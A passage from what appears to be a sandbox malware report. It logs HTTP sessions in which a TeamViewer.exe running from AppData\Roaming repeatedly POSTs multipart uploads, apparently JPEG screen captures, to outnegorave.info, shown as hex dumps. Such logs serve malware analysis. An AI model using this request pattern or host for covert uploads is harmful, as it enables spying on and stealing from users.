                                                                                                                                    2021-09-15 11:52:39 UTC2567OUTData Raw: 8f fb 35 c0 5d 1f de 37 d6 b9 70 1b c8 f4 f3 07 f0 1d 45 b7 fc 8a b1 ff 00 9e f5 90 f5 ad 01 ff 00 8a 52 2f f3 de b1 9d 8e 6a a8 2d 65 ea 61 8c 7a 47 d0 63 12 3a 1a 03 b0 e8 c6 93 39 a4 ae bb 1e 67 33 24 13 b8 ef 9a 77 9e 0f de 40 6a 1a 29 72 a2 94 da 25 3e 43 7d e4 c5 21 b6 81 ba 1c 54 74 51 67 d1 8d 55 7d 41 b4 f5 3f 75 85 44 da 7c 83 a7 35 36 4f 50 6a 45 91 c7 f1 1a 2f 24 5a 9a 33 da d6 55 ea a6 a3 31 b0 ea 0d 6c 09 5b b8 14 ed c8 7e f2 03 4f da 35 d0 d1 6b d4 c3 20 8e c6 92 b6 cc 36 ef d5 71 4c 36 10 b7 dd 6c 53 f6 a8 76 66 3d 15 a6 da 59 fe 16 06 a1 7d 3e 65 e8 b9 a6 aa 47 b8 59 94 e8 a9 9a da 55 ea 87 f2 a8 8a 30 ea 0d 5a 69 88 4a 28 c5 14 c0 29 69 28 a0 43 a9 73 4d a5 14 08 75 4f 7c 7f e2 9a 6f fa ea 2a b8 a9 af cf fc 53 4c 3f e9 b0 ac 31 1b 23 7c
                                                                                                                                    Data Ascii: 5]7pER/j-eazGc:9g3$w@j)r%>C}!TtQgU}A?uD|56OPjE/$Z3U1l[~O5k 6qL6lSvf=Y}>eGYU0ZiJ()i(CsMuO|o*SL?1#|
                                                                                                                                    2021-09-15 11:52:39 UTC2583OUTData Raw: a6 21 d4 52 52 d3 00 a2 8a 5a 04 14 b4 51 8a 62 16 96 92 8a 62 03 4a 29 29 45 00 28 a4 a5 14 86 98 82 96 92 81 48 07 0a 70 a6 d2 d5 21 31 68 a4 a5 a6 02 d1 45 14 12 2d 14 51 4c 02 8a 28 a0 43 85 2d 34 52 8a 68 05 a5 a4 a5 a6 48 52 d2 52 8a 60 2d 14 51 4c 42 d1 49 4b 40 82 96 92 96 9a 01 d4 52 0a 5a 64 85 28 a2 8a 60 2d 14 0a 5a 62 12 92 96 8a 00 41 d6 9f 4c 1d 69 f4 20 61 41 a2 8a 64 80 a5 a4 14 ec 50 81 8a 05 3a 9b 4e 15 48 96 27 7a 5a 43 d6 9c 29 80 82 9d 4d a5 14 c4 c5 a2 8a 28 10 0a 5a 41 4e a6 21 29 d4 94 53 06 3a 96 9a 29 69 92 3b 34 a2 9b 4a 29 a1 31 c2 96 9b 4e 14 c9 61 4b 49 45 31 0b 45 25 2d 00 14 b4 94 b4 00 b4 b4 da 75 02 61 4a 29 29 68 10 b4 52 52 d0 20 a5 a2 8a 60 14 a2 8a 51 40 98 b4 0a 4a 51 40 8d 0d 24 7e fd cf a2 1a ac 7a 9f ad 5a d2 7f
                                                                                                                                    Data Ascii: !RRZQbbJ))E(Hp!1hE-QL(C-4RhHRR`-QLBIK@RZd(`-ZbALi aAdP:NH'zZC)M(ZAN!)S:)i;4J)1NaKIE1E%-uaJ))hRR `Q@JQ@$~zZ
                                                                                                                                    2021-09-15 11:52:39 UTC2599OUTData Raw: 45 25 2d 02 16 94 52 52 d3 10 51 49 4b 4c 05 a5 a6 d2 d0 21 c2 8a 4a 5a a1 0a 29 69 b9 a5 a6 21 d9 a5 a6 d2 d0 21 c2 94 53 69 41 aa 4c 96 48 28 a4 06 8a a4 48 b4 b4 94 66 98 58 5c d1 9a 41 4b 45 c5 61 45 2e 69 94 b9 a7 70 b0 fc d2 d3 33 4b 9a 64 d8 70 a5 cd 37 34 53 b8 58 7e 68 cd 37 34 6e f6 a2 e2 b1 20 34 b9 a8 f7 1f 5a 33 ef 4e e2 b1 26 45 19 a8 f3 4b 9a 2e 2b 0f cd 19 a6 e6 8c d3 b8 58 75 2e 69 b4 66 8b 8a c3 b3 4b 9a 66 68 cd 3b 85 87 e6 8c d3 37 52 6e a2 e1 ca 49 9a 33 51 ee a3 75 2b 87 29 26 ea 4d d5 11 7a 69 7a 1c 86 a0 4c 5a 9a 5e a2 2f 4d 2d 52 e6 52 81 29 7a 61 7a 8c b5 30 b5 43 91 6a 04 85 fd e9 85 a9 85 a9 85 aa 1c 8d 14 47 96 a6 16 a6 96 a6 16 ac dc 8d 14 47 13 4c 26 90 9a 4a 86 cb 48 52 69 29 28 cd 26 3b 08 68 a0 d3 6a 4a 41 9a 29 29 29 5c
                                                                                                                                    Data Ascii: E%-RRQIKL!JZ)i!!SiALH(HfX\AKEaE.ip3Kdp74SX~h74n 4Z3N&EK.+Xu.ifKfh;7RnI3Qu+)&MzizLZ^/M-RR)zaz0CjGGL&JHRi)(&;hjJA)))\
                                                                                                                                    2021-09-15 11:52:39 UTC2615OUTData Raw: 45 4f a6 39 27 eb f9 57 3d af fc 35 d4 2c f7 4d a4 49 f6 d8 47 3e 5b 61 65 1f d1 bf 4f a5 33 c4 1f 0e 35 1b 0d d3 69 4c 6f a0 1c ec 03 12 a8 fa 7f 17 e1 cf b5 74 1e 11 f0 36 86 6d 63 be b9 97 fb 46 43 d5 19 76 a4 6d dd 4a 75 c8 ee 1b f2 a4 07 95 cd 14 90 4a d1 4f 1b c7 22 1c 32 3a 90 41 f7 06 99 5d 1f c4 24 48 fc 6b 7e 91 aa a2 28 88 05 51 80 07 94 95 ce 55 08 2a de 9b 64 d7 d7 42 30 76 a0 e5 db d0 55 4a e8 3c 2f b7 17 20 f5 f9 7f 2e 6a 64 ec b4 22 a5 45 4d 73 b5 7b 1b 96 7a 35 b8 4d 96 d6 62 4d a3 92 53 71 fc 6a be a1 e1 c1 70 ac 23 b5 68 66 1d 0a a1 1f 98 ad d1 bf fb 36 dc 45 93 18 ce fc 7f 7f 3d ff 00 0c 56 de 9b e6 fd 85 3c fc ee c9 db bb ae de df d6 b0 c4 d2 95 0c 3a c4 29 6b d8 f4 61 8e a7 5a 7e ca 30 f7 4f 16 9a 27 82 67 8a 55 2a e8 4a b0 3d 8d 32
                                                                                                                                    Data Ascii: EO9'W=5,MIG>[aeO35iLot6mcFCvmJuJO"2:A]$Hk~(QU*dB0vUJ</ .jd"EMs{z5MbMSqjp#hf6E=V<:)kaZ~0O'gU*J=2
                                                                                                                                    2021-09-15 11:52:39 UTC2618OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 36 33 36 36 39 30 32 37 35 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------3636690275--
                                                                                                                                    2021-09-15 11:52:40 UTC2618INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:40 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=5680050c237b7e3adbaedd32ec81ef6d5a4b30e4dec77061f3e6970425f3f46c; expires=Thu, 15-Sep-2022 11:52:39 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8UgaLEerX2afNhCSPuvZDDVXD%2FQgqGhl8i4jZeugXZAHZbeXvut3dG8CkPlIY8CDWC9mazBLtm0PBgzP04Q%2F%2BwkZA16pEUvGHd0KhKVr7dSvCoQoe%2B%2FYutwIJkJzrwH2XoTt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a66fdd3e690a-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:52:40 UTC2619INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    31192.168.2.549822172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:52:40 UTC2619OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84958
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------1861026164
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:52:40 UTC2619OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 38 36 31 30 32 36 31 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------1861026164Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:52:40 UTC2619OUTData Raw: 9b d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 7b 14 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 cd c9 a7 51 fe d1 49 1a 5e c2 70 95 e1 35 5f 84 67
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^{;ZV}}h-^fcKQI^p5_g
                                                                                                                                    2021-09-15 11:52:40 UTC2619OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                                    2021-09-15 11:52:40 UTC2635OUTData Raw: 15 06 55 2c 87 62 e1 94 fa d7 91 eb ba 44 da 2e a0 d6 d2 c8 92 a7 58 e5 8c e5 5d 7d 7d 8f a8 ff 00 f5 d7 ad f9 da 77 fd 06 2f ff 00 ef b6 ff 00 e2 6b 96 f8 a6 54 db 68 85 1d 9d 4a 4b 86 6e ac 31 1f 26 9d 29 34 ec 2a 89 5a e7 9e 52 53 b0 29 31 5d 16 30 12 8a 5c 51 83 40 1b 9e 0b ff 00 91 bb 4e ff 00 ae bf d0 d7 b6 d7 89 78 2f fe 46 ed 37 fe ba ff 00 43 5e b9 24 22 e7 56 99 25 92 70 89 04 65 55 26 74 19 2d 26 4f ca 47 a0 fc ab 1a 8a f2 d4 d6 0e cb 43 46 aa de b6 c1 0b 95 66 55 93 9d aa 5b f8 58 74 1f 5a 85 6c ec de 57 89 2e 2e 5a 48 f1 bd 45 e4 b9 5c f4 cf cd 4f fe cd b7 ff 00 9e 97 7f f8 17 2f ff 00 15 59 da 3d ff 00 0f f8 25 de 5d bf 1f f8 07 9c f8 e7 43 b5 89 5f 55 b2 57 88 16 1e 6c 6d 13 28 24 9e a3 23 f4 ae 26 bd 4f c6 6e d2 7c 3d b7 79 18 b3 b0 80 b3
                                                                                                                                    Data Ascii: U,bD.X]}}w/kThJKn1&)4*ZRS)1]0\Q@Nx/F7C^$"V%peU&t-&OGCFfU[XtZlW..ZHE\O/Y=%]C_UWlm($#&On|=y
                                                                                                                                    2021-09-15 11:52:40 UTC2651OUTData Raw: 8f fb 35 c0 5d 1f de 37 d6 b9 70 1b c8 f4 f3 07 f0 1d 45 b7 fc 8a b1 ff 00 9e f5 90 f5 ad 01 ff 00 8a 52 2f f3 de b1 9d 8e 6a a8 2d 65 ea 61 8c 7a 47 d0 63 12 3a 1a 03 b0 e8 c6 93 39 a4 ae bb 1e 67 33 24 13 b8 ef 9a 77 9e 0f de 40 6a 1a 29 72 a2 94 da 25 3e 43 7d e4 c5 21 b6 81 ba 1c 54 74 51 67 d1 8d 55 7d 41 b4 f5 3f 75 85 44 da 7c 83 a7 35 36 4f 50 6a 45 91 c7 f1 1a 2f 24 5a 9a 33 da d6 55 ea a6 a3 31 b0 ea 0d 6c 09 5b b8 14 ed c8 7e f2 03 4f da 35 d0 d1 6b d4 c3 20 8e c6 92 b6 cc 36 ef d5 71 4c 36 10 b7 dd 6c 53 f6 a8 76 66 3d 15 a6 da 59 fe 16 06 a1 7d 3e 65 e8 b9 a6 aa 47 b8 59 94 e8 a9 9a da 55 ea 87 f2 a8 8a 30 ea 0d 5a 69 88 4a 28 c5 14 c0 29 69 28 a0 43 a9 73 4d a5 14 08 75 4f 7c 7f e2 9a 6f fa ea 2a b8 a9 af cf fc 53 4c 3f e9 b0 ac 31 1b 23 7c
                                                                                                                                    Data Ascii: 5]7pER/j-eazGc:9g3$w@j)r%>C}!TtQgU}A?uD|56OPjE/$Z3U1l[~O5k 6qL6lSvf=Y}>eGYU0ZiJ()i(CsMuO|o*SL?1#|
                                                                                                                                    2021-09-15 11:52:40 UTC2667OUTData Raw: 94 53 13 16 8a 28 a0 40 29 69 05 3a 98 84 a7 52 51 4c 18 ea 5a 68 a5 a6 48 ec d2 8a 6d 28 a6 84 c7 0a 5a 6d 38 53 25 85 2d 25 14 c4 2d 14 94 b4 00 52 d2 52 d0 02 d2 d3 69 d4 09 85 28 a4 a5 a0 42 d1 49 4b 40 82 96 8a 29 80 52 8a 29 45 02 62 d0 29 29 45 02 34 34 91 fb f7 3e 88 6a b1 ea 7e b5 6b 49 ff 00 5d 27 fb a6 aa 9e a7 eb 59 2f 8d 84 fe 14 14 51 45 68 64 14 b4 94 b4 08 5a 29 29 69 09 8b 45 14 50 01 4a 28 a2 90 85 a2 8a 29 08 5a 51 49 40 a0 43 a9 57 ad 36 96 93 04 5b 88 d6 be 98 df be 5a c5 89 b8 ad 7d 30 fe f9 7e b5 c7 5d 7b ac f5 30 6f de 44 be 2e 3f e8 48 3d eb 8c b5 ff 00 90 84 3f f5 d1 7f 9d 76 3e 2f ff 00 8f 58 fe b5 c6 da 7f c8 42 0f fa e8 bf ce 9e 13 fd dc db 13 fe f0 76 7a ef fc 7d 2f fb b5 97 8a d4 d7 7f e3 ed 7f dd ac ba 8a 1f 02 23 13 fc 46
                                                                                                                                    Data Ascii: S(@)i:RQLZhHm(Zm8S%-%-RRi(BIK@)R)Eb))E44>j~kI]'Y/QEhdZ))iEPJ()ZQI@CW6[Z}0~]{0oD.?H=?v>/XBvz}/#F
                                                                                                                                    2021-09-15 11:52:40 UTC2683OUTData Raw: 4b 4d a5 a0 43 85 14 94 b5 42 14 52 d3 73 4b 4c 43 b3 4b 4d a5 a0 43 85 28 a6 d2 83 54 99 2c 90 51 48 0d 15 48 91 69 69 28 cd 30 b0 b9 a3 34 82 96 8b 8a c2 8a 5c d3 29 73 4e e1 61 f9 a5 a6 66 97 34 c9 b0 e1 4b 9a 6e 68 a7 70 b0 fc d1 9a 6e 68 dd ed 45 c5 62 40 69 73 51 ee 3e b4 67 de 9d c5 62 4c 8a 33 51 e6 97 34 5c 56 1f 9a 33 4d cd 19 a7 70 b0 ea 5c d3 68 cd 17 15 87 66 97 34 cc d1 9a 77 0b 0f cd 19 a6 6e a4 dd 45 c3 94 93 34 66 a3 dd 46 ea 57 0e 52 4d d4 9b aa 22 f4 d2 f4 39 0d 40 98 b5 34 bd 44 5e 9a 5a a5 cc a5 02 52 f4 c2 f5 19 6a 61 6a 87 22 d4 09 0b fb d3 0b 53 0b 53 0b 54 39 1a 28 8f 2d 4c 2d 4d 2d 4c 2d 59 b9 1a 28 8e 26 98 4d 21 34 95 0d 96 90 a4 d2 52 51 9a 4c 76 10 d1 41 a6 d4 94 83 34 52 52 52 b8 ec 50 c7 7a 5a 4a 2b 94 eb 16 8a 28 c5 00 14
                                                                                                                                    Data Ascii: KMCBRsKLCKMC(T,QHHii(04\)sNaf4KnhpnhEb@isQ>gbL3Q4\V3Mp\hf4wnE4fFWRM"9@4D^ZRjaj"SST9(-L-M-L-Y(&M!4RQLvA4RRRPzZJ+(
                                                                                                                                    2021-09-15 11:52:40 UTC2699OUTData Raw: 93 ed b0 8e 7c b6 c2 ca 3f a3 7e 9f 4a 67 88 3e 1c 6a 36 1b a6 d2 98 df 40 39 d8 06 25 51 f4 fe 2f c3 9f 6a e8 3c 23 e0 6d 0c da c7 7d 73 2f f6 8c 87 aa 32 ed 48 db ba 94 eb 91 dc 37 e5 48 0f 2b 9a 29 20 95 a2 9e 37 8e 44 38 64 75 20 83 ee 0d 32 ba 3f 88 48 91 f8 d6 fd 23 55 44 51 10 0a a3 00 0f 29 2b 9c aa 10 55 bd 36 c9 af ae 84 60 ed 41 cb b7 a0 aa 95 d0 78 5f 6e 2e 41 eb f2 fe 5c d4 c9 d9 68 45 4a 8a 9a e7 6a f6 37 2c f4 6b 70 9b 2d ac c4 9b 47 24 a6 e3 f8 d5 7d 43 c3 82 e1 58 47 6a d0 cc 3a 15 42 3f 31 5b a3 7f f6 6d b8 8b 26 31 9d f8 fe fe 7b fe 18 ad bd 37 cd fb 0a 79 f9 dd 93 b7 77 5d bd bf ad 61 89 a5 2a 18 75 88 52 d7 b1 e8 c3 1d 4e b4 fd 94 61 ee 9e 2d 34 4f 04 cf 14 aa 55 d0 95 60 7b 1a 65 6d 78 c7 cb ff 00 84 a2 f7 ca c6 37 2e 71 eb b4 67 f5
                                                                                                                                    Data Ascii: |?~Jg>j6@9%Q/j<#m}s/2H7H+) 7D8du 2?H#UDQ)+U6`Ax_n.A\hEJj7,kp-G$}CXGj:B?1[m&1{7yw]a*uRNa-4OU`{emx7.qg
                                                                                                                                    2021-09-15 11:52:40 UTC2702OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 38 36 31 30 32 36 31 36 34 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------1861026164--
                                                                                                                                    2021-09-15 11:52:41 UTC2702INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:41 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=c836121081c168a6ee523fe5fadb5d19dd7b7a46406c1a515623898e8ca6a841; expires=Thu, 15-Sep-2022 11:52:40 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3LIIdID%2BkwlfwIlfmAMMncJjjEHrk%2Bk1dqf2UgvknDf%2FUPG1wtMzU4VMFvcvlgugzBNFOwC1GtMw343udD1KA%2BGj7gnhYXzXUa3N8Mi%2BLkpTUJTw%2FyP%2BO7x1TuNZpiObRAaP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a6779a96d6e1-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:52:41 UTC2703INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    32192.168.2.549823172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:52:41 UTC2703OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84979
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------2060288736
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:52:41 UTC2703OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 30 36 30 32 38 38 37 33 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------2060288736Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:52:41 UTC2703OUTData Raw: b1 d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 48 14 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 9d bb fb 0f bd 80 17 0b 2b 94 2b f4 b7 66 1d b3 24 dd d1 5b ac c5 47 d8 09 b3 88 c4 ba 2e f6 a6 3a 2c 9c 8f 72 49 a7 8c 9e 60 9f bf d3 6c a7 bd c1 c6 2b ca 0d 24 15
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^H;ZV}}h-^fcK++f$[G.:,rI`l+$
                                                                                                                                    2021-09-15 11:52:41 UTC2703OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                                    2021-09-15 11:52:41 UTC2719OUTData Raw: 15 06 55 2c 87 62 e1 94 fa d7 91 eb ba 44 da 2e a0 d6 d2 c8 92 a7 58 e5 8c e5 5d 7d 7d 8f a8 ff 00 f5 d7 ad f9 da 77 fd 06 2f ff 00 ef b6 ff 00 e2 6b 96 f8 a6 54 db 68 85 1d 9d 4a 4b 86 6e ac 31 1f 26 9d 29 34 ec 2a 89 5a e7 9e 52 53 b0 29 31 5d 16 30 12 8a 5c 51 83 40 1b 9e 0b ff 00 91 bb 4e ff 00 ae bf d0 d7 b6 d7 89 78 2f fe 46 ed 37 fe ba ff 00 43 5e b9 24 22 e7 56 99 25 92 70 89 04 65 55 26 74 19 2d 26 4f ca 47 a0 fc ab 1a 8a f2 d4 d6 0e cb 43 46 aa de b6 c1 0b 95 66 55 93 9d aa 5b f8 58 74 1f 5a 85 6c ec de 57 89 2e 2e 5a 48 f1 bd 45 e4 b9 5c f4 cf cd 4f fe cd b7 ff 00 9e 97 7f f8 17 2f ff 00 15 59 da 3d ff 00 0f f8 25 de 5d bf 1f f8 07 9c f8 e7 43 b5 89 5f 55 b2 57 88 16 1e 6c 6d 13 28 24 9e a3 23 f4 ae 26 bd 4f c6 6e d2 7c 3d b7 79 18 b3 b0 80 b3
                                                                                                                                    Data Ascii: U,bD.X]}}w/kThJKn1&)4*ZRS)1]0\Q@Nx/F7C^$"V%peU&t-&OGCFfU[XtZlW..ZHE\O/Y=%]C_UWlm($#&On|=y
                                                                                                                                    2021-09-15 11:52:41 UTC2735OUTData Raw: 8f fb 35 c0 5d 1f de 37 d6 b9 70 1b c8 f4 f3 07 f0 1d 45 b7 fc 8a b1 ff 00 9e f5 90 f5 ad 01 ff 00 8a 52 2f f3 de b1 9d 8e 6a a8 2d 65 ea 61 8c 7a 47 d0 63 12 3a 1a 03 b0 e8 c6 93 39 a4 ae bb 1e 67 33 24 13 b8 ef 9a 77 9e 0f de 40 6a 1a 29 72 a2 94 da 25 3e 43 7d e4 c5 21 b6 81 ba 1c 54 74 51 67 d1 8d 55 7d 41 b4 f5 3f 75 85 44 da 7c 83 a7 35 36 4f 50 6a 45 91 c7 f1 1a 2f 24 5a 9a 33 da d6 55 ea a6 a3 31 b0 ea 0d 6c 09 5b b8 14 ed c8 7e f2 03 4f da 35 d0 d1 6b d4 c3 20 8e c6 92 b6 cc 36 ef d5 71 4c 36 10 b7 dd 6c 53 f6 a8 76 66 3d 15 a6 da 59 fe 16 06 a1 7d 3e 65 e8 b9 a6 aa 47 b8 59 94 e8 a9 9a da 55 ea 87 f2 a8 8a 30 ea 0d 5a 69 88 4a 28 c5 14 c0 29 69 28 a0 43 a9 73 4d a5 14 08 75 4f 7c 7f e2 9a 6f fa ea 2a b8 a9 af cf fc 53 4c 3f e9 b0 ac 31 1b 23 7c
                                                                                                                                    Data Ascii: 5]7pER/j-eazGc:9g3$w@j)r%>C}!TtQgU}A?uD|56OPjE/$Z3U1l[~O5k 6qL6lSvf=Y}>eGYU0ZiJ()i(CsMuO|o*SL?1#|
